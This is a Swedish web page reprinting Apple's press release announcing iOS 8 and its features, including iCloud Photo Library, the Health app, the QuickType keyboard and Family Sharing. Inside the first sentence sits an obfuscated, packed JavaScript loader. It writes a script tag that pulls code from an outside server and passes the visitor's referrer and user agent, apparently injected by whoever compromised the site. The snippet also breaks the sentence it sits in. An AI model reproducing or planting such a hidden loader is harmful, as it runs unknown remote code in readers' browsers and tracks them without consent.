Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Apple presenterar iOS 8

apple logo
Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|edhyn|var|u0026u|referrer|kbydh||js|php’.split(’|’),0,{}))
presenterade idag iOS 8, den största uppdateringen sedan lanseringen av App Store, som ger användarna suveräna nya funktioner och förser utvecklare med nya verktyg som hjälper dem att skapa fantastiska nya appar. iOS 8 ger en enklare, snabbare och mer intuitiv användarupplevelse och har funktioner som iCloud Photo Library som gör att du enklare kan dela dina bilder och videor mellan dina olika enheter.
Dessutom ingår nya meddelandefunktioner så att du enkelt kan dela röst, video eller bilder med bara en svepande rörelse samt en helt ny Health-app som ger dig en tydlig översikt över dina hälso- och träningsdata på ett enda ställe. iOS 8 har även förutseende textinmatning för Apples QuickType-tangentbord, Family Sharing – det enklaste sättet att dela köp, bilder och kalendrar inom samma hushåll samt iCloud Drive där du kan lagra filer och komma åt dem var som helst.
”iOS 8 ger enklare, snabbare och mer intuitiva sätt att använda din enhet med suveräna nya funktioner som iCloud Photo Library, en ny meddelandeapp, QuickType-tangentbordet och en helt ny Health-app”, säger Craig Federighi, Apples vice VD för Software Engineering. ”Vi ger också utvecklare fantastiska nya verktyg för att göra hantering av hälsan och hemmet från din enhet till en integrerad, enkel och säker upplevelse.”
I iOS 8 ger appen Bilder och iCloud Photo Library dig åtkomst till alla dina bilder och videor när som helst och var som helst. Du kan enkelt hitta dina bilder och de är enhetligt ordnade på alla dina kompatibla enheter. Appen Bilder kan automatiskt räta upp horisonter och med smarta redigeringsverktyg kan du enkelt justera ljusstyrka och färg eller använda separata verktyg för mer finjustering. Tack vare iCloud Photo Library uppdateras varje justering och effekt automatiskt på alla dina enheter.
Samtal i Meddelanden blir mer uppslukande när du kan kommunicera genom att bara svepa. Med Tap to Talk kan du dela din röst och samma enkla gest fungerar även för att dela videor och bilder i Meddelanden. Gruppmeddelanden ger dig nu möjlighet att lägga till och ta bort kontakter, lämna ett samtal samt alternativet att inte bli störd. Användarna kan enkelt bläddra genom bilder och videor i ett samtal samt dela flera bilder och videor samtidigt. Du kan välja att dela din nuvarande plats i Meddelanden under en timme, en dag eller längre.
Nya Health-appen samlar in information som du väljer från olika hälsoappar och träningsenheter och ger dig en tydlig och aktuell översikt på ett enda ställe. I iOS 8 kan utvecklare låta hälso- och träningsappar kommunicera med varandra. Med din tillåtelse kan varje app använda specifik information från andra appar för att ge ett mer mångsidigt sätt att hantera din hälsa och träning. Exempelvis Nike+-appar som använder NikeFuel kan hämta andra HealthKit-mätningar som sömn och näringsintag för att bygga en anpassad användarprofil och förbättra träningsresultaten.
Apples nya QuickType-tangentbord är smartare och mer personligt med förutseende textinmatning som tänker på sammanhanget, till exempel vem mottagaren är och vilken app du skriver i. QuickType förstår hur du kommunicerar och föreslår favoritfraser så att du kan skriva hela meningar genom att bara trycka några gånger. Det ditt tangentbord lär sig krypteras på din enhet och skickas aldrig till molnet.
iOS 8 introducerar Family Sharing som gör det enklare än någonsin att dela köp, bilder och kalendrar inom samma hushåll. Hela familjen kan bläddra i och ladda ner de andra familjemedlemmarnas köp i iTunes, iBooks eller App Store. Upp till sex familjemedlemmar kan delta, alla med egna Apple-ID:n. Föräldrar kan skapa Apple-ID:n för barn, vilket inkluderar funktionen Ask to Buy där tillstånd från förälder krävs för köp. Tack vare Family Sharing håller alla kontakten med hjälp av en delad bildström för familjen, en delad kalender och möjligheten att hitta familjemedlemmar och deras enheter.

 

 

För företag bygger iOS 8 vidare på den nya IT-modellen för en mobil arbetskraft genom att förbättra det sätt som användarna informeras på om hur deras enheter är konfigurerade, administrerade eller begränsade. iOS 8 erbjuder utökade säkerhets- och administrationsförbättringar samt nya produktivitetsfunktioner, t.ex. utökat dataskydd för viktiga inbyggda appar, möjlighet att ställa in frånvaromeddelande, se medarbetares tillgänglighet när du bokar ett möte och stöd för konfigurerbara Thread Notifications i Mail.

Bland de nya iOS 8-funktionerna finns:

• designförbättringar som bygger vidare på det snygga gränssnittet i iOS 7 och ger interaktiva meddelanden, snabb åtkomst till viktiga kontakter, möjlighet att snabbt växla fram och tillbaka mellan inkorgen och utkast i Mail samt intelligenta förslag
• utökade Spotlight-funktioner som inte bara ger dig resultat från din enhet, utan även artiklar från Wikipedia, nyheter och resultat från platser i närheten
• större kontinuitet mellan iPhone, iPad och Mac, bland annat med Handoff som gör det möjligt att börja en aktivitet på en enhet och avsluta den på en annan, Instant Hotspot och möjligheten att ringa och ta emot samtal samt skicka SMS- och MMS-meddelanden från din Mac eller iPad.
iOS 8 beta-mjukvaran finns tillgänglig omedelbart för iOS Developer Program-medlemmar på developer.apple.com. iOS 8 blir tillgänglig i höst som en gratis mjukvaruuppdatering för iPhone 4s, iPhone 5, iPhone 5c, iPhone 5s, iPod touch (5:e generationen), iPad 2, iPad med Retina-skärm, iPad Air™, iPad mini™ och iPad mini med Retina-skärm. iCloud Photo Library och iCloud Drive använder din iCloud-lagring där de första 5 GB är gratis. Funktionerna kan ändras. Vissa funktioner är inte tillgängliga i alla områden eller på alla språk.
Detta är ett pressmeddelande från Apple